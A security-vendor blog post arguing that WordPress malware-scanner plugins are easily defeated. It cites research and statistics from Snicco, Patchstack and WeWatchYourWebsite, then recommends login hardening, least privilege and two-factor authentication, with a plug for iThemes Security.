Why WordPress Malware Scanners Are Worthless

New research from Snicco, WeWatchYourWebsite, Automattic-backed GridPane, and PatchStack reveals WordPress malware scanners that operate as plugins in a compromised environment are fundamentally flawed. Malware scanners are cleanup tools at best for already-compromised sites. They’re not a solid line of defense, and they’re being actively defeated by malware in the wild right now. Leave malware detection to a quality host. Focus your security policies on login authentication hardening, user management, proper delegation of privileges, and vigilant version management.

So 2000-and-Late: Malware Scanners Have Outlived Their Usefulness

Malware detection plugins for WordPress date back to around 2011, when SQL injection attacks were common and effective. Anyone working with WordPress back then will remember a widely-used image editing library called TimThumb. It was subjected to zero-day exploits with horrible results for millions of sites.

This was the emergency context WordPress security plugins grew out of — as a reaction. Some security plugins today still look like Norton Security and McAfee Anti-Virus. Those were popular security applications for Windows 20-30 years ago. But as John McAfee said after leaving the company he created, his antivirus scanner had been turned into “bloatware.” In his opinion, it was “the worst software in the world.”

Similar conclusions could be drawn today about WordPress malware scanners based on the recent findings of several WordPress security researchers.

“An already compromised environment cannot be trusted to analyze itself.”

Calvin Alkan, Founder of Snicco

An Illusion of Safety: WordPress Malware Scanners Put to the Test

In the first part of a series called “Malware Madness: Why everything you know about your WordPress Malware Scanner is wrong,” WordPress security researcher Calvin Alkan (Founder of the security company Snicco) shares some of his work. Alkan worked with Patrick Gallagher (GridPane CEO and Co-Founder) and Thomas Raef (Owner, WeWatchYourWebsite.com) to see if malware scanners could be defeated. Unsurprisingly, it turns out they can be defeated — very easily. Patchstack provided independent confirmation of Alkan’s results.

Local Scanners: The Call is Coming from Inside the House

In their tests, Alkan and his collaborators first looked at local scanners. Wordfence, WPMU Defender, the free version of All-In-One Security (AIOS), and NinjaScanner work on the same server as the WordPress site they’re installed on. That means the malware scanners use the same PHP process as WordPress and the malware infecting it. Nothing is stopping the malware from actively interacting with the scanner. The malware could disable any security plugins it detects, whitelist itself (reported in 2018), or manipulate scanners so they don’t detect the intrusion.

“Both the Malware Scanner and the Malware run within the same PHP process. This means malware can manipulate or tamper with the scanner’s functionality — an equivalent scenario would be a defendant serving as their own judge in a court trial.”

Calvin Alkan, “Malware Madness Part 1“

Next, Alkan and his partners produced working proofs-of-concept to defeat malware scanners. (They’ve also offered to share their exploit kits privately with security researchers and vendors.) According to Patchstack CEO Oliver Sild, the exploit kits consist of only a few lines of code.

Alkan also found that “rendered” malware, “which dynamically constructs itself using PHP,” is undetectable by local malware scanners. Finally, the local scanners failed to detect “in-process” malware. This type of malware “executes once and then deletes itself from the system, leaving no trace of its presence.”

Remote Scanners: Defeated By Evidence Tampering and Crime Scene Cleansing

Scanners that perform their analysis on a remote server include Malcare, Virusdie, All-In-One Security (AIOS) Pro, Sucuri, and JetPack Scan. These newer remote scanning methods have several advantages, including a diminished footprint and impact on your local server’s performance. Local scanners use your site’s server resources to do their work, which has a performance cost. Remote malware analysis is also protected from manipulation since it’s not happening within the same PHP process as an active malware infection.

What remote scanners are vulnerable to is malware that manipulates the data sent back to the remote server for analysis. Alkan built another proof-of-concept that demonstrates remote scanners can be defeated in this way — by hiding the “evidence” of a malware infection. Oliver Sild confirmed this result as well:

“Data tampering can be achieved conceptually with the local plugin being a target of deception. We have received a proof of concept that clearly demonstrates this.”

Oliver Sild, CEO of Patchstack in Snicco’s report, “Malware Madness Part 1“

A slightly different malware tactic might involve “scrubbing the crime scene” and leaving no trace of infection to be scanned. Alkan suggested this is possible but did not provide a proof of concept.

It’s important to note that file integrity scanning that looks for unauthorized changes can be helpful when you’re trying to detect a malware infection. This type of scan compares local files against a protected, remote code repository to detect unofficial changes in WordPress core or plugin and theme files. Unfortunately, change detection can be defeated if the process is tampered with by malware.

Not Just a Hypothetical: Malware is Already Disabling WordPress Security Scanners in the Wild

Following Alkan’s exploit kits, the biggest reveal in Snicco’s report comes from Thomas Raef, the CEO of We Watch Your Website, which detects and cleans up hacked WordPress sites:

“Over the last 60 days, 52,848 sites got hacked with WordFence installed prior to infection. The installed malware tampered with WordFence files in 14% of the cases (7,399). Other popular services had even higher percentages; MalCare coming in at 22%, and VirusDie at 24%.”

Thomas Raef, Founder of We Watch Your Website in Snicco’s report, “Malware Madness Part 1“

For a detailed account of We Watch Your Website’s analysis, see Thomas Raef’s report, “How We Identified Nearly 150K Hacked WordPress Sites in 60 Days.”

That is game over for malware-scanning plugins. It tells us that WordPress malware scanning is pure security theater — “the practice of taking security measures that are considered to provide the feeling of improved security while doing little or nothing to achieve it.”

No doubt this has been going on for a long time, too.

Security industry veteran and Kadence marketing director Kathy Zant told Alkan:

“Over the course of about 18 months, I was cleaning WordPress sites for a well-known company in WordPress, removing malware from well over 2,000 sites during my tenure. The earliest timeframe I saw [malware defeating malware scans] was in mid to late 2017. [….] I am sure it still exists. And there very well could be additional variants that perform similar actions, or even worse.”

Kathy Zant, CEO of Zantastic LLC in Snicco’s report, “Malware Madness Part 1“

That’s the bad news: malware scanners can’t be trusted. The good news is they have never offered a real defense. If all you’ve lost is an illusion of security, that is actually a step toward gaining real security.

How to Secure Your WordPress Site — Properly

Following a bombshell report like Snicco’s, the big question is, “How can WordPress sites achieve a high confidence in their security?”

Alkan believes security methods must be tailored to each server stack, and server-side malware scanning performed by the host is the only worthwhile type of scanning for site owners.

“WordPress security plugins should ONLY be doing stuff that can best be done at the application/PHP layer,” he emphasizes.

“The WordPress community needs to shift its security approach from detection to prevention while maintaining the importance of malware scanning to verify the efficacy of the ‘higher layers’ of security.”

Calvin Alkan

Strong user login security like two-factor authentication and passkeys coupled with session security are areas Alkan says WordPress plugins can help — plugins like iThemes Security. That’s always been the guiding philosophy of our development team — a security plugin is best suited to hardening sites and decreasing the attack surface.

Other essential ways to harden your WordPress site’s defenses include careful user management following the principle of the least privilege: never give more power to a user than is necessary. And for more privileged users, they require a higher standard of security — 2FA, passkeys, trusted devices, and strong passwords that have never appeared in a known breach.

Attack trends today are intelligently targeting small to mid-sized businesses with password stuffing, phishing, and spearphishing. These attack vectors exploit weak login authentication and human error. They use brute force and clever social engineering tactics to compromise individual user accounts. Armed with a hacked user account, an attacker can do a lot of damage. They may do even more harm if they also see a vulnerable plugin to exploit. Once inside your system, an attacker can create backdoors to slip back in at any time.

A security plugin that emphasizes a malware scanner isn’t going to stop them.